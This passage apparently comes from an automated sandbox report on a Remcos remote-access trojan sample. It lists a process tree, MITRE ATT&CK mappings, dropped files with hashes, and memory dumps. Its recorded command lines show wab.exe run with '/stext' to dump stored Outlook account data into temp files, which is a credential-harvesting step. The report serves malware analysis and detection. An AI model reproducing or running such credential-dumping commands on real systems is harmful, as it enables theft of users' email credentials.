        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vsellwfxuvljfmhuvngrimvsyybasati"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3800
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\fmjdm"
        5⤵
        Accesses Microsoft Outlook accounts
        
        PID:4540
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qowwmzbs"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3816 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:3116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
d2b0ffa1888daf28120d82a6fe6870f8

SHA1
5f9ab47efdfa0c9d7f083dfd2655d4c1e41af2f1

SHA256
ef2e31223b571ebdd97c7f512830df0323de836116b0fdd11839ff5aa6316016

SHA512
4082b279583a6739d09e7f5139899310da896ab8758100f9a44149a0c70307549d1b49bc5c6fd7aedfbd86e3530ab38d36333b19323c9e662674381a7d4b0644

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05kxyqmd.o05.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsellwfxuvljfmhuvngrimvsyybasati

Filesize
4KB

MD5
10fa8ec140c204486092fb161e567ec7

SHA1
4d63e1f8df3afefedb19df73d7ee5f3b1e7b6473

SHA256
7176ca3d0196ec46f178107fdb587adaef3f6ea65daa80eccd2371a515880e04

SHA512
9db4eeb3f07d8d0579f75f3426c91156809152d8c1a37c9a27bf159888f6dd97f1212ac80f5bbb17e4d86f3087c512ccba2ca50a2db07d071370bd36364e1f76

Download Submit
C:\Users\Admin\AppData\Roaming\deklaration.Sup

Filesize
462KB

MD5
3b92fa0f1d715cbbaa016578884ac617

SHA1
de73eff4b1c5cd26fd136bfedced527da435c1bf

SHA256
b018f004337242bb0c295a80fe5ce6f45da3292975e5e7cdd5c6ca518036b5c2

SHA512
dc92137ea01380835df30d160875d4ad54a9e457632e15c89c1d64f5f2b916339a4be5eda6541d835e1fd6c96ea70509e427f9191526d526cfd58e859d945bad

Download Submit
memory/112-43-0x0000000008F10000-0x00000000094B4000-memory.dmp

Filesize
5.6MB

Download
memory/112-25-0x0000000006210000-0x0000000006276000-memory.dmp

Filesize
408KB

Download
memory/112-20-0x00000000053E0000-0x0000000005416000-memory.dmp

Filesize
216KB

Download
memory/112-21-0x0000000005B70000-0x0000000006198000-memory.dmp

Filesize
6.2MB

Download
memory/112-41-0x0000000007D00000-0x0000000007D96000-memory.dmp

Filesize
600KB

Download
memory/112-42-0x0000000007050000-0x0000000007072000-memory.dmp

Filesize
136KB

Download
memory/112-24-0x0000000005B30000-0x0000000005B52000-memory.dmp

Filesize
136KB

Download
memory/112-45-0x00000000094C0000-0x000000000B43E000-memory.dmp

Filesize
31.5MB

Download
memory/112-26-0x0000000006280000-0x00000000062E6000-memory.dmp

Filesize
408KB

Download
memory/112-32-0x00000000063B0000-0x0000000006704000-memory.dmp

Filesize
3.3MB

Download
memory/112-37-0x00000000068C0000-0x00000000068DE000-memory.dmp

Filesize
120KB

Download
memory/112-38-0x0000000006AF0000-0x0000000006B3C000-memory.dmp

Filesize
304KB

Download
memory/112-39-0x00000000082E0000-0x000000000895A000-memory.dmp

Filesize
6.5MB

Download
memory/112-40-0x0000000006FE0000-0x0000000006FFA000-memory.dmp

Filesize
104KB

Download
memory/1596-58-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1596-62-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1596-59-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2448-23-0x00007FFEAB890000-0x00007FFEAC351000-memory.dmp

Filesize
10.8MB

Download
memory/2448-22-0x00007FFEAB893000-0x00007FFEAB895000-memory.dmp

Filesize
8KB

Download
memory/2448-17-0x00007FFEAB890000-0x00007FFEAC351000-memory.dmp

Filesize
10.8MB

Download
memory/2448-16-0x00007FFEAB890000-0x00007FFEAC351000-memory.dmp

Filesize
10.8MB

Download
memory/2448-11-0x0000020574840000-0x0000020574862000-memory.dmp

Filesize
136KB

Download
memory/2448-52-0x00007FFEAB890000-0x00007FFEAC351000-memory.dmp

Filesize
10.8MB

Download
memory/2448-15-0x00007FFEAB890000-0x00007FFEAC351000-memory.dmp

Filesize
10.8MB

Download
memory/2448-4-0x00007FFEAB893000-0x00007FFEAB895000-memory.dmp

Filesize
8KB

Download
memory/3800-60-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3800-64-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3800-56-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4232-76-0x000000001FFD0000-0x000000001FFE9000-memory.dmp

Filesize
100KB

Download
memory/4232-80-0x000000001FFD0000-0x000000001FFE9000-memory.dmp

Filesize
100KB

Download
memory/4232-79-0x000000001FFD0000-0x000000001FFE9000-memory.dmp

Filesize
100KB

Download
memory/4232-48-0x00000000022D0000-0x000000000424E000-memory.dmp

Filesize
31.5MB

Download
memory/4540-61-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4540-63-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4540-57-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download